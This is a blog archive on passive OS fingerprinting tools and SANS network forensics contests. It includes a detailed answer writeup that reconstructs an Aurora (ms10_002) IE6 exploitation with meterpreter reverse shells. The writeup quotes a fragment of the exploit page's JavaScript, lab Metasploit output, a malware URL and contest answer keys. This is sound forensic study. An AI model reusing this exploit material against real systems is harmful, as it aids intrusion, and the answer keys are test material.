Chatter on the Wire: How excessive network traffic gives away too much!

NetSlueth

2012-01-27T13:24:00.000-07:00

It was posted to the fingerbank discussion list in the past week on the Alpha version of NetSlueth. I'd tagged it to go back and look at, and unlike most of the time I tag things for follow up I did it in less than 6 months!

I guess it was just 2 days ago, wow, not sure I've ever gotten back that quick.

Anyway, partial info from the list:
"I basically used tshark for low level processing, allowing me to focus on the logic of the analysis. It needs ALOT more work, including improving my sloppy coding skills. It requires a full installation of Wireshark and .Net Framework or later on the machine. I'm going to make it fully mono compatible shortly."

By using tshark he took a lot of the headache out of coding underlying pieces that I've dealt with in Satori. Anyway, I ran some initial pcap files I had around through it and it seemed to do quite nicely on identifying the OS running on them. I didn't have any luck with a live capture, but I didn't dig around very long on trying to figure out why either!

I need to dig into it more and see what all protocols they are utilizing, but if you need another little tool, this one may be worth looking at!

Fingerprint Editor 1.00.08

2012-01-12T18:19:00.002-07:00

Jeff recompiled his fingerprint editor for us with the latest .xml files from my fingerprint database!

p0f v3

2012-01-10T18:04:00.001-07:00

And I though MZ gave up on p0f after no updates to v2 in years. I guess I'm proven wrong....

== What's new ==

Version 3 is a complete rewrite, bringing you much improved SYN and SYN+ACK fingerprinting capabilities, auto-calibrated uptime measurements, completely redone databases and signatures, new API design, IPv6 support (who knows, maybe it even works?), stateful traffic inspection with thorough cross-correlation of collected data, application-level fingerprinting modules (for HTTP now, more to come),
and a lot more.

----

On my list to test in the near future and provide some new fingerprints. Assuming time permits and how well it works (I have no doubts well, but...), I will look at what it is doing and see if I can incorporate new stuff/ideas into a newer tcp plugin for Satori.

Using Machine Learnign Techniques for Advanced Passive Operating System Fingerprinting

2011-11-05T21:04:00.000-06:00

Ok, guess I'm about a year out on this, but....

Anytime someone mentions your work in their master thesis, it is a nice thing to mention it and post a link!

His thesis can be found here.

He covers a lot of the same ground initially I did it my paper on OS Fingerprinting, but also covers a few tools and newer techniques that were not around back in 2005 or whenever it was that I wrote my paper on this subject. This is only in regards to the start of the paper, giving a quick overview of fingerprinting techniques and tools, he then dives deeply into other things that go well beyond what I've covered previously. I guess it is a master thesis,so it better!

He does bring up a good point/issue with passive fingerprinting and ipsec. Which since I'm working on a final project for school right now discussing network security and ipsec, it may be worth me looking into this a bit more!

DLink cloud managed solutions - offer dhcp fingerprinting in basic option

2011-11-05T20:33:00.000-06:00

I don't have a lot of details here, I've been sitting on a lot of "Os fingerprinting" notices the past 6 months, been so busy with work and school I haven't posted much, but have some time to catch up this weekend.

Anyway, DLink has a cloud based solution that does DHCP OS Fingerprinting, more are more every day seem to finally be catching on on how to use this!

One of many articles can be found here.

OS fingerprinting with IPv6

2011-11-05T20:22:00.000-06:00

I was sad to see they didn't go into DHCPv6 at all in this, but the author goes into IPv4 with IPv6 fingerprinting, some of what still works, some possible new stuff.

He did this for his GIAC Gold, maybe I should have used my DHCP presentation for Blackhat and got a Gold Cert on one of the many GIAC certs I hold. Oh well.

Check out the paper here.

ArubaOS 6.0.1.0 adds DHCP fingerprinting

2011-11-05T20:06:00.001-06:00

They are using their own DB, but now the ArubaOS supports doing DHCP fingerprinting of devices on the network. You can find the writeup here

It is good to see more products doing this!

My original introduction to them doing this was this blog post:
http://airheads.arubanetworks.com/vBulletin/showthread.php?p=11211

There haven't been a lot of things published on this, but it is something new they've added recently.

Fingerbank presentation at Defcon 19

2011-11-05T19:56:00.000-06:00

Ok, I knew Oliver did a presentation fingerbank, but didn't realize it was recorded.

It can be found here.

I did find it interesting that he said he was introducing fingerbank when we did that back in 2007, but it did die off and they brought it back!

Anyway, check it out if you want.

Fingerbank.org is back

2011-08-24T09:37:00.000-06:00

The people at packetfence have brought fingerbank.org back. It has been awhile in the making, but they have 2 email lists setup now also to discuss unknown fingerprints and other topics on dhcp fingerprinting.

You can see their writeup here

Glad to see it back!

New tools to be aware of for pcap stuff

2011-05-24T10:28:00.000-06:00

streams: http://www.honeynet.org/node/633?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HoneynetProjectAggregated+%28Blog+postings+from+honeynet.org%29
splitting and other parsing: http://www.netresec.com/?page=SplitCap
rawcapture (winpcap not required): http://www.netresec.com/?page=RawCap

I'm sure there are a ton more buried in my email that I've missed recently, but these all looked promosing.

Directory Scanner

2011-05-24T10:22:00.002-06:00

Not a tool I've played with, but on my list for one of these days if I ever have some time.

Supposedly can tell if it is AD, eDir, OpenLDAP, etc.

Forensics Contest #8

2011-05-05T19:29:00.001-06:00

Well after a VERY long break they've released the latest puzzle. This one has to do more with parsing and pulling info about wireless. While I probably have the skills to do it, I'm not sure I'll participate in this one. School is finishing up and my free time is very short in this next month.

If nothing else I may just figure out the answers without writing any specific program to be released for it.

It has been out a good week so far and I have yet to grab the pcap file and look it over. Satori will probably spit out an error as I have it set to reject wireless packets as I haven't wanted to parse out the extra header info in the past.

May run into through a converter so Satori can at least read it in, though I'll lose most of what they want you to find with SSID stuff and beacon packets.

prads

2011-01-01T12:20:00.000-07:00

After a break from programming for awhile I think I'll take a look at some C programming again. I'm not sure how much time I'll be able to put into it with work/school/life, but I'd like to take a look at C again if I can come up with an IDE I like to program in. I really dislike most of the ones I've come across in the recent past.

Anyway, the prads project seems a good place to get involved if I can dedicate some time.

The main link for them are here:
http://gamelinux.github.com/prads/

The C stuff they've done so far covers most of what they had in the perl version before. As my favorite stuff is DHCP I'm going to see if I can write a new module to dump in there. If things work out I'll give them the code, if not it will just be me getting my feet wet in C again.

If nothing else maybe we can get some of the Satori fingerprints moved into their project. If they eventually get everything done they want to they'll be doing a lot of what I originally planned on doing with Satori!

A few new updates

2010-09-29T19:34:00.000-06:00

First, I've been working on DHCPv6 fingerprinting. Not sure how many fingerprints I'll end up with in the end, but there is a dll implemented, there is an xml file and now, thanks to Jeff, there is an update to the editor!

Fingerprint Editor 1.00.06 has been published here :
http://pagesperso-orange.fr/cycocrew/delphi/FingerprintEditorSetup.exe

He also updated the DEF File Editor to 1.00.04 :
http://pagesperso-orange.fr/cycocrew/delphi/DEFFileEditorSetup.exe

I need to get back to SIP fingerprinting one of these days also. It was added to the editor back in 1.00.05 and I have a dll and a xml file for it also, but I haven't worked much on the xml file there yet either.

Forensics Contest #6 (yeah, the last contest)

2010-08-02T20:06:00.000-06:00

But First....

While it would have been nice to be at defcon and participate in contest #7, I didn't have that opportunity. Nor, based on some of the emails I got would have I probably done very good at it since it appeared to be wireless packets that you had to glean info from. Who knows we'll see once they post the ~50MB pcap file.

Anyway, my netbook that I won from contest #6 came in about a week ago. I just wanted to say thanks to Sherry, Eric and Jonathan for putting the contest together and to those that provided other support for it! I look forward to the next contests!

Web application Fingerprinting with Blind Elephant

2010-08-02T20:01:00.000-06:00

I don't talk about too many active fingerprinting applications, granted I don't know that there have been a lot of new fingerprinting applications in awhile. Anyway, ran across this today from one of the many posts picked up in Google Reader. Looks promising, I'll leave it to you to find out though!

Fingerprint Editor updated

2010-07-26T15:49:00.000-06:00

Jeff put out a new version of the XML Fingerprint Editor for me this week after I started adding SIP fingerprints to Satori. There have been a few updates recently, the main update here was for SIP, but there have been a few cosmetic changes recently also.

As for SIP and Satori, more will be coming out on that in the next few weeks. I'm short on time, but about a week ago started adding the ability for Satori to look for Server, UserAgent and a few other pieces of info out of UDP traffic. Hopefully in the next week or two I'll have something available for download!

Contest #6 winners

2010-07-08T17:07:00.000-06:00

Erik Hjelmvik, #2 and wins some prizes finally!

Listening to the event live now.

ps, I made finalist again, just not quite in the top 3.

Upcoming presentation for Forensics Challenge #6 and 4Cast Awards

2010-07-04T20:42:00.001-06:00

Only July 8th they will be presenting the awards for these 2 different things. They'll also be streaming it for those not in attendance of the '2010 SANS What Works in Digital Forensics and Incident Response Summit'.

I didn't see any good links out there for these off of the forensics contest page, so unless you are used to doing SANS webinars and knew to look there you may not have known this was happening:

Forensics Contest #6: July 8th 6:30 EST
https://www.sans.org/webcasts/forensic-challenge-winners-presentation-93648

Live Forensics 4Cast Awards: July 8th 7:30 EST
https://www.sans.org/webcasts/live-forensic-4cast-awards-ceremony-93653

Something for some of you do do in the wee hours of the night, end of your work day, or right after you get home. All depending on where you find yourself in the world.

Forensic contest #6 Answer

2010-06-28T09:20:00.002-06:00

Ok, it is now 6/28/10 around the world, so here is my writeup on the latest forensics contest from forensicscontest.com.

---

Answer 1: http://10.10.10.10:8080/index.php
Answer 2: vEI
Answer 3a: index.phpmfKSxSANkeTeNrah.gif
Answer 3b: DF3E567D6F16D040326C7A0EA29A4F41
Answer 4: 1.3
Answer 5: 87.6
Answer 6a: Windows executable
Answer 6b: B062CB8344CD3E296D8868FBEF289C7C
Answer 7a: Every third packet
Answer 7b: Every packet
Answer 7c: Every 10-15 seconds
Answer 8: 123.7
Answer 9: B062CB8344CD3E296D8868FBEF289C7C
Answer 10: 198.4

---

Tools Used:
NetworkMiner 0.92 - http://networkminer.sourceforge.net/
SplitCap 1.3 - http://sourceforge.net/projects/splitcap/
Satori 0.71 - http://myweb.cableone.net/xnih/download/satori.zip
mz-filecarver 0.1 - http://myweb.cableone.net/xnih/download/filecarve-cmd.zip
contest6 pack - http://myweb.cableone.net/xnih/download/contest6.zip
frhed - http://frhed.sourceforge.net/
wireshark - http://www.wireshark.org/

Note:
The file forensics part could be done, just as easy, with linux, using tcpflow and foremost, but I wanted to to introduce some new tools and challenge myself with using something a little different and sticking to doing it all in Windows.

---

Timeline:
Date of packet capture: 2010-04-28

17:39.59.311284 - packet capture begins, client visits and grabs index.php via HTTP Get, this php file has
17:39.59.773396 - client requests index.phpmfKSxSANkeTeNrah.gif
17:40:00.577135 - Initial syn packet to port 4444 is sent that will setup a connection that stays active until 17:41:26, in which time it downloads a 748K file (meterpreter reverse tcp connection) among other things.
17:40:35.258314 - first attempted connection (out of 119 that failed) to port 4445. These packets have a unique fingerprint in how often (# of packets) sent they change their IPID, SeqNum and Source Port.
17:42:02.985483 - Initial syn packet to port 4445 is sent that will setup a connection that stays active until 17:43.17, in which time it also downloads a 748K file (another meterpreter reverse tcp session, most likely to keep a session open even after IE was closed) among other things.
17:43:17.753022 - last packet in capture

---

Process:

I always like to start by trying to determine the OS's involved in the process. This can help understand what else may be going on in the process. So the first thing we'll do is run the capture file through Satori:

We get 2 systems. According to the Overall system info we have SMB, TCP and Web User Agent identifications made:
10.10.10.70 - Windows XP SP2+ workstation (SMB, TCP, and Web fingerprints) named SaucyDev in the workgroup/domain 'workgroup' (SMB fingerprint), running what appears to be IE 6.0 (MSIE 6.0; Windows NT 5.1: SV1) - where SV1 indicates SP2 or greater installed.

10.10.10.10 - is some type of Linux system, running Apache, very generic TCP fingerprint. Over the course of the converstation we have TCP ports 4444 and 4445 open (TCP fingerprint).

Notes:
http://10.10.10.10:8080/index.php was the infected file, we see this in the Referer under Web. (question #1)

----

The packet capture started at: 17:39.59.311284 on 2010-04-28, this will be used to calculate how long since the packet capture started so we know when things happen. While in some cases I like to know how long it took to get from point A to B, I'm normally more interested in when it actually happened, so that I can try to coorelate that with system logs across multiple systems.

----

To find out when the TCP session to port 4444 was opened we need to look at the SYN packets sent. Unfortunetly, just because a SYN was sent doesn't mean the connection was actually made, there were numerous attempts made that were rejected!

It is easier to verify what happened by looking at output from the perl script (contest6.pl) that tracks 3 way handshakes (syn, syn/ack, ack):

contest6.pl -r evidence06.pcap -o conv

Attempted conversations: 119
[1] - Starts at packet number 1153
[2] - Starts at packet number 1155
[3] - Starts at packet number 1157
...
[117] - Starts at packet number 1650
[118] - Starts at packet number 1652
[119] - Starts at packet number 1654
Full 3 way handshake conversations: 2
[0] - Starts at packet number 13
[120] - Starts at packet number 1656
Total Packets: 2554

The first 3 way handshake started in packet #13

One thing I found interesting running this script is I see 119 attempted conversations that just ended in RST/ACK packets, but if I follow a lot of those conversations in Wireshark they are a different conversation #. This is due to the fact that it reuses the TCP Sequence number, Wireshark sees those as part of the same conversation. So while I see it as conversation 120, wireshark actually see's it as 42. Wireshark may be more accurate, but I think by looking at it that way it misses the fact that the remote system is making multiple attempts to connect in each TCP stream.

We can get all Syn packets using contest6.exe this way for readability:

contest6.exe -r evidence06.pcap -l S > syn-output.txt

The last 3 fields, in order are: IPID, TCP Sequence Number, and the TCP Acknowledgement Number.
13 17:40:00,577135 S 10.10.10.70:1036 -> 10.10.10.10:4444 53 72acc97a 00000000

So packet #13 was 1.265851 seconds after the start of the capture, on 1.3 seconds assuming you figure the beginning of the 3 way handshake vs the end of it. 1.3 seconds rounded off to the nearest 10th regardless. (question #4)

The other 3 way handshake took place in packet 1656, so back to syn-output.txt, we get:

1656 17:42:02,985483 S 10.10.10.70:1044 -> 10.10.10.10:4445 598 75fad66c 00000000

123.674199 seconds, or 123.7 rounded off to the nearest 10th. (question #9)

----

Now we need to look for Fin/Ack packets for connections closing, we can do that with:

contest6.exe -r evidence06.pcap -l FA > fa-output.txt

Which we see part of below:
1562 17:41:26,898379 FA 10.10.10.10:4444 -> 10.10.10.70:1036 38671 e3317217 72ae4105
1563 17:41:26,898438 FA 10.10.10.70:1036 -> 10.10.10.10:4444 551 72ae4105 e3317217

using our start time from above we get 87.587 seconds since the start, or 87.6 rounded to the nearest 10th. (answer #5)

We also see another closure here:
2552 17:43:17,751953 FA 10.10.10.70:1044 -> 10.10.10.10:4445 845 75fb02df 55a9adcc
2553 17:43:17,752630 FA 10.10.10.10:4445 -> 10.10.10.70:1044 24677 55a9adcc 75fb02e0

This ends up being 198.44 seconds from the start of the capture, or 198.4 rounded to the nearest 10th. (answer #10)

----

Going back to the syn-output.txt we can see that the system 10.10.10.70 had actually been attempting to do connections to port 4445 even before its connection to port 4444 was closed:

1533 17:41:22,305270 S 10.10.10.70:1041 -> 10.10.10.10:4445 537 00fa0ff6 00000000
1535 17:41:22,844924 S 10.10.10.70:1041 -> 10.10.10.10:4445 538 00fa0ff6 00000000
1537 17:41:23,282416 S 10.10.10.70:1041 -> 10.10.10.10:4445 539 00fa0ff6 00000000
1539 17:41:23,283067 S 10.10.10.70:1041 -> 10.10.10.10:4445 540 00fe281a 00000000
1541 17:41:23,829288 S 10.10.10.70:1041 -> 10.10.10.10:4445 541 00fe281a 00000000
1543 17:41:24,376142 S 10.10.10.70:1041 -> 10.10.10.10:4445 542 00fe281a 00000000
1545 17:41:24,376807 S 10.10.10.70:1041 -> 10.10.10.10:4445 543 0102b86a 00000000
1547 17:41:24,813664 S 10.10.10.70:1041 -> 10.10.10.10:4445 544 0102b86a 00000000
1549 17:41:25,360537 S 10.10.10.70:1041 -> 10.10.10.10:4445 545 0102b86a 00000000
1551 17:41:25,361178 S 10.10.10.70:1041 -> 10.10.10.10:4445 546 0106f45b 00000000
1553 17:41:25,798024 S 10.10.10.70:1041 -> 10.10.10.10:4445 547 0106f45b 00000000
1555 17:41:26,344909 S 10.10.10.70:1041 -> 10.10.10.10:4445 548 0106f45b 00000000
1557 17:41:26,345542 S 10.10.10.70:1041 -> 10.10.10.10:4445 549 010b3308 00000000
1559 17:41:26,782405 S 10.10.10.70:1041 -> 10.10.10.10:4445 550 010b3308 00000000
[connection closed in here]
1566 17:41:27,329294 S 10.10.10.70:1041 -> 10.10.10.10:4445 553 010b3308 00000000
1568 17:41:34,189450 S 10.10.10.70:1042 -> 10.10.10.10:4445 554 7c016356 00000000
1570 17:41:34,657404 S 10.10.10.70:1042 -> 10.10.10.10:4445 555 7c016356 00000000
1572 17:41:35,094902 S 10.10.10.70:1042 -> 10.10.10.10:4445 556 7c016356 00000000
1574 17:41:35,095570 S 10.10.10.70:1042 -> 10.10.10.10:4445 557 7c058b67 00000000
1576 17:41:35,641778 S 10.10.10.70:1042 -> 10.10.10.10:4445 558 7c058b67 00000000
1578 17:41:36,188636 S 10.10.10.70:1042 -> 10.10.10.10:4445 559 7c058b67 00000000
1580 17:41:36,189278 S 10.10.10.70:1042 -> 10.10.10.10:4445 560 7c0a5039 00000000
1582 17:41:36,735524 S 10.10.10.70:1042 -> 10.10.10.10:4445 561 7c0a5039 00000000
1584 17:41:37,282377 S 10.10.10.70:1042 -> 10.10.10.10:4445 562 7c0a5039 00000000
1586 17:41:37,283051 S 10.10.10.70:1042 -> 10.10.10.10:4445 563 7c0f0451 00000000
1588 17:41:37,829280 S 10.10.10.70:1042 -> 10.10.10.10:4445 564 7c0f0451 00000000
1590 17:41:38,376531 S 10.10.10.70:1042 -> 10.10.10.10:4445 565 7c0f0451 00000000
1592 17:41:38,376795 S 10.10.10.70:1042 -> 10.10.10.10:4445 566 7c13ac51 00000000
1594 17:41:38,813646 S 10.10.10.70:1042 -> 10.10.10.10:4445 567 7c13ac51 00000000
1596 17:41:39,360524 S 10.10.10.70:1042 -> 10.10.10.10:4445 568 7c13ac51 00000000
1598 17:41:46,149972 S 10.10.10.70:1043 -> 10.10.10.10:4445 569 2be336bc 00000000

This pattern repeats itself, both before and after port 4444 is closed, but as you can see every 15 packets it changes the source port it is sending from (question #7.3). Every packet it changes the IPID (question #7.2) and every 3 packets it changes the TCP Sequence Number (question #7.1).

This pattern repeats itself 2 more full times before the end of the capture from this point. It completes a total of 8 iterations over the packet capture.

"contest6.pl -r evidence06.pcap -o ipinfo" could also be used to determine the info above. Both programs have their useful depending on what you are trying to determine.

----

Now that we've looked at the simple stuff, lets feed the file to NetworkMiner and SplitCap. Erik Hjelmvik recently released verison 0.92 of NetworkMiner specifically for this contest, he added the ability for it to pick up better on conversations already in progress in the packet capture (no 3 way handshake), such as packets #1-12, which in the past would have been skipped. So thanks Erik! I'm actually still running the beta version of it, but I believe the full blown version has since been released of 0.92.

Using NetworkMiner we can extract the php file. Looking over that file and cleaning up code for readability we get this, plus a lot more, but for question #2 we see what it shoves in the data part of the array:

...
var c1 = "COMMENT";
var Array1 = new Array();
for (i = 0; i < 1300; i++)
{
Array1[i] = document.createElement(c1);
Array1[i].data = "vEI";
}

...

NetworkMiner also recovers a .gif file. After running through it we can go look at that file and get the MD5 off of the 1 by 1 pixel file: DF3E567D6F16D040326C7A0EA29A4F41 (question #3)

Unfortunetly NetworkMiner doesn't help us with the non-standard traffic on port 4444 or 4445, at least not in the current version, maybe a future release, we can hope at least.

So lets move over to another program by Erik Hjelmvik, SplitCap. It works nicely for this, though its one short coming in my opinion, like a lot of the scripts written that we've seen in the past, is that it doesn't take into account resent packets, out of order, etc like NetworkMiner does. Maybe that will be fixed in a future release, again we can hope.

Anyway, we'll run splitcap with:
"splitcap -r evidence06.pcap -s flow -y L7"

We get a directory created called evidence06, with ~21 files in there. This is the TCP or UDP "data" after the respective headers for each of the streams. I believe it is the same general information that we could get with tcpflow on linux.

The main ones of interest are:
evidence06.pcap.TCP_10-10-10-10_4444_10-10-10-70_1036.bin
evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin
evidence06.pcap.TCP_10-10-10-10_8080_10-10-10-70_1035.bin
evidence06.pcap.TCP_10-10-10-70_1035_10-10-10-10_8080.bin
evidence06.pcap.TCP_10-10-10-70_1036_10-10-10-10_4444.bin
evidence06.pcap.TCP_10-10-10-70_1044_10-10-10-10_4445.bin
evidence06.pcap.UDP_10-10-10-70_138_10-10-10-255_138.bin

The fun thing with using this is we can look at files like: evidence06.pcap.TCP_10-10-10-70_1035_10-10-10-10_8080.bin

And see exactly what was requested:
(question #1)
GET /index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 10.10.10.10:8080
Connection: Keep-Alive

(question #3)
GET /index.phpmfKSxSANkeTeNrah.gif HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://10.10.10.10:8080/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 10.10.10.10:8080
Connection: Keep-Alive

The 2 main ones we are interested in are the port 4444 and 4445 files that splitcap provided us. Opening these files up with a hex editor we see an initial 4 bytes 00 6a 0b 00, possibly a protocol header or a command to download a file, because immediately after this we see the MZ magic header info. (question #6.1) We'll come back to the initial 4 bytes here in a little bit.

mzcarver.exe was written specifically to look for MZ headers in tcp dump files. We could use foremost to carve this out, but I wanted to do this all on windows, without trying to get cygwin working on the system. mzcarver does have some limitations at this point. See the readme file that accompanies it for that.

We use mzcarver.exe like this:
mzcarver /r evidence06.pcap.TCP_10-10-10-10_4444_10-10-10-70_1036.bin /d
mzcarver /r evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin /d

The /d option dumps out to disk the pre and post data that surrounded the mz file. At this point since I only carve out PE files, it appends .pe on the extracted file (this file could be a dll, exe, etc).

After running mzcarever we get the following files:
evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.post
evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.pre
evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.pe

evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.post
evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.pre
evidence06.pcap.TCP_10-10-10-10_4445_10-10-10-70_1044.bin.pe

Checking the files, the first thing we notice is that the .pe files are the same size (748,032). Checking their MD5 sums we get:
port 4444 one B062CB8344CD3E296D8868FBEF289C7C (question #6.2)
port 4445 one B062CB8344CD3E296D8868FBEF289C7C (question #9)

The same thing, so why did it download the same file twice, just on different ports? Or more to the point why did "they" fire up a 2nd reverse TCP meterpreter session? More on this still to come.

Both .pre files have the same data in them "00 6a 0b 00". With a small tweak to put it in the correct byte order we get: 000b 6a00 or in Decimal format 748,032, which is the size of the file that follows. Note: Erik Hjelmvik pointed this out to me in discussions we had on this contest. I had figured out there was the pre/post info already, but hadn't determined if it was a protocol command or what at that time.

Looking at the .post files, we see the first 14 bytes are the same, but after that they start to deviate:
"16 03 00 00 4a 02 00 00 46 03 00 4b d9 48"

Some quick searches in google seem to indicate the first 8-11 bytes there appear to be some type of SSL communication/handshake.

Scanning through the .pe file with a hex editor we can see a lot of Open SSL info. I believe it even tells the version of OpenSSL, 0.9.8k

So between the OpenSSL references in the .pe file and what appears to be some type of SSL handshake in the .post info I'd say they are doing some type of encrypted data traffic after the sending of the file is complete.

In an attempt to find out more about the .pe file I renamed it to .exe and tried executing it on a VM. It comes up as an invalid executable.

---

In an attempt to understand what was going on here I downloaded Metasploit 3.4 and ran the ms10_002_aurora exploit against a few test VMs. I found that my XP SP2 IE6 box (base install of SP2, no patches) did appeared to be vulnerable (image that). I ended up with this lovely screen:
[*] Sending stage (748032 bytes) to 192.168.4.9
[*] Meterpreter session 1 opened (192.168.4.10:4444 -> 192.168.4.9:1149) at 2010-06-23 21:33:55 -0700

As you can see here it sent 748032 bytes, again same size we saw above, so this capture at least appears to have been done with metasploit running on the linux attack machine.

Now the question of why the windows box was constantly trying to connect back to the Linux host on port 4445 and why they started up a 2nd meterpreter session once they did? Exploiting IE appears to work fine with the ms10_002_Aurora exploit, but if/when the user closes IE down, your connection drops. So how to overcome this.... As soon as you get your initial interactive session you upload a new program and launch it. This new program will try to reverse connect back to you as new process. Perhaps setting this up to run as a new service, or just a simple one time run. This way, even if IE gets closed down you get the new connection on port 4445 connected to you and go in over that connection.

I honestly don't know if that is what happened in this case, but, whatever was trying to contact back on port 4445 had to try multiple times and is quite chatty. Leaving a specific signature that would be fairly easy to detect with an IDS. Changing its source port every 15 packets, its seqnum every 3 and its ipid every 1 at least as long as it continues to try to connect to the remost system on port 4445 and fails. Typically you'd want to be listening ahead of time on that port, or perhaps have a more random and longer pause time between packets.

Note: In all fairness I wouldn't have even looked at this from the Metasploit side if Erik hadn't mentioned it in our ongoing conversations, he at least got me started down the Meterpreter road here. This brings up why I like to work on issues like this in a team setting, it gives you someone else to bounce ideas/issues off of!

---

So yes, Metasploit and the ms10_002_aurora exploit makes pretty easy work of compromising a XP box with IE6 still installed on it. This appears to be what happened overall in this case, but there may be other exploits that utilize some of these same things.

Full Disclosure vs Responsible Disclosure

2010-06-21T16:36:00.002-06:00

There was an ongoing thread war last week (or the week before) on Full Disclosure vs Responsible disclosure when someone notified MS of a bug and then 4 days later released the info to the public. After being on vacation for the past week or so I now see there is a known exploit in the wild on this.

Over the years I've gone back and forth on the whole FD vs RD argument. Now that I support a few hundred systems I'm normally more on the RD side of things, but when is it the vendors responsibility to at least be forthcoming about information on the issue to people who report issues?

In the above case, I'm not sure 4 days is reasonable to expect MS to fix the issue, and I have no idea what, if anything, they responded to the person who informed them of it. But I got thinking of this again today when I logged into Twitter.

Back at the beginning of May it was reported that if you changed any of your settings in Twitter that your password would be sent in clear text. The original author of the post claimed they notified twitter of it. I know I also did, I figured if more than one person mentioned it it may get past the first line of Helpdesk personnel. Fast forward ~45 days, no response from twitter and the bug still exists.

I decided I'd poke around a bit more on their site, see if I could figure out a better way to contact them. After 10 mins of going in circles, I was back at the same form I'd tried before. They have a place that says "Check Existing Requests" and "View recently solved and closed tickets", but for the life of me, no way to open a new ticket!

Now I at least understand better what happens when we get upset clients, complaining about going round and round in circles and getting nowhere. We all put things in place to try to limit the number of actual calls that come in, hopefully allowing the user to find the answer themselves, but when it so frustrates the person reporting issues, I can see why some resort to FD from the get go.

I still like the idea of RD, but sometimes I have to admit, some things get fixed a lot quicker when an exploit is floating around out there. While this is great for getting things fixed, it still really sucks being the guy on the other end trying to rush a patch out! It also really sucks being the support guy that has to install that patch on 100's of systems!

Forensics contest #5 results

2010-06-04T09:09:00.002-06:00

Well NetworkMiner is getting a huge amount of use in these forensic contests these days. By my count 6 of the 10 finalists used it this time around (still reading through all 10 of them, just did a quick term search, so some may have just mentioned it and not actually used it).

Reading through the winners entry, as noted by the contest owners was very well done, it provided a very nice walk through and is well worth the read.

He did his analysis on a windows box also (like I did), but the more I think about it, the more I think we should be looking at doing this on Linux. A lot of it is a comfort level, what tools you have available etc, but if you know you are working with something that is going to be attacking windows, doesn't it make sense to do your analysis on a system you know it can't infect? I went to great lengths to run mine in a sandbox, on a VM I was willing to scrub, and with no outside network, but the more I think about this the more I think doing analysis on the OS that the infection is going to go after is a bad idea.

With that said, I'm still working on contest #6 on a windows system currently because I'm writing a program that will specifically carve exe's out of a tcp data stream, but hey, I'm more comfortable on windows, give me a break!

On the other hand, you don't always know what payload you are going to find, and driveby malware is everywhere, so is any system actually safe these days!

Forensics Contest #6 Ann's Aurora

2010-05-22T12:43:00.002-06:00

Hi! Recently we were challenged by SANS Fellow Rob Lee (author of “Computer Forensics” 508) to create a puzzle based on an Advanced Persistent Threat (APT). We thought this was a great idea! So this month we are doing a special release through the SANS Institute based on APT. SANS is sponsoring some especially cool prizes– check out the full puzzle and writeup here:

http://computer-forensics.sans.org/challenges/

The contest is a client-side attack based on Operation Aurora. This packet capture contains a full recording of a real Windows system getting exploited via the same mechanism that was used to exploit Google. Ann spear-phishes a developer, who clicks on a link and connects to her malicious web server. Then she configures the victim to make outbound persistent connection attempts to her server so that she can retain access and reconnect in the future.

---

A bit different than the first 4, uses ideas you may have come up with in #5, but has some new twists to be sure! One other twist is you have to have a SANS portal account to grab the evidence file. Not sure what is required to get an account, I already have one since I hold a few certs from there already.

On top of that they are pushing the upcoming Forensics Summit in DC, more info can be found here:
http://www.sans.org/forensics-incident-response-summit-2010/agenda.php

Looking over the agenda here is some interesting info:

On Thursday July 8th (end of the first day)
6:30pm - 7:30pm
SANS Forensic Challenge Winners Presentation
Winners of the 2010 Forensic Challenge "Ann's Aurora" to be announced and presented with their awards via this live and internet broadcasted event!
Prizes: 2 netbook and free passes to the 2011 Forensics/IR Summit

Or directly from the writeup:
Prizes

2 Lenovo Ideapad SNIFT Configured Netbooks for first and second place teams.

In addition, each team that places in the top three will be awarded free passes to the 2011 Incident Response and Forensic Summit (One pass per entry)

You have a little over a month, good luck! (deadline 6/27/2010)

Detecting x86 buffer overflow shellcode attacks at the network level

2010-05-19T09:18:00.002-06:00

Interesting article. A bit outside of my comfort level/understanding on things since I don't play much with memory, but interesting none the less. Not sure how accurate the article is, but for your reading enjoyment.

Maybe it will all make more sense ones I go back through Chapter 2 in "The Rootkit Arsenal" book that I'm currently reading. Chapter 2 was all about jumping around in memory and it seems to be a very well written book so far, but more on that some other time.

What does your browser tell about you

2010-05-18T15:58:00.002-06:00

This has been talked about in a few places the past 2 days, but it is a good topic for excess info and what it tells about you. I'm pretty sure someone did something on this before, but maybe not.

Anyway, some good research to look at about how unique your browser really is and how it can be used to track back to you. This is due to plugins, cookies and other things.

A good way to block it are:
TorButton, NoScript or other Java Script blocking tools, or a bunch of corporate cloned machines! I'm sure there were other things, that is what I recall from my quick read the other day.

The main paper can be found here.

Forensics contest #5 Answer

2010-05-14T16:05:00.003-06:00

Well 5/13/10 has come and gone now, so here are my answers for the latest contest. As noted later in my writeup, no new tools this time, just my writeup and approach to it.

Answer 1a: sdfg.jar
Answer 1b: q.jar
Answer 2: ADMINISTRATOR
Answer 3: http://nrtjo.eu/true.php
Answer 4: 5942BA36CF732097479C51986EEE91ED
Answer 5: UPX
Answer 6: 0F37839F48F7FC77E6D50E14657FB96E
Answer 7: 213.155.29.144

Description:
Up Front:
This is a writeup on how I did it, in a manual process, with no new tools, just an attempt to do the analysis in a controlled environment and not infect anything that I didn't want to.

Before doing any malware analysis there are a few things to know/understand.
1. Odds are whatever machine you are doing this on is going to get infected sooner or later.
2. While running in a VM env is a good way to test/work on these, there is the possiblity for the programs to determine they are in a VM and act differently because of it.

System Setup:
- XP VM
- Sandbox software - www.sandboxie.com
- Hashtab - beeblebrox.org
- NetworkMiner - networkminer.sourceforge.net
- wireshark
- exeinfope
- PEiD
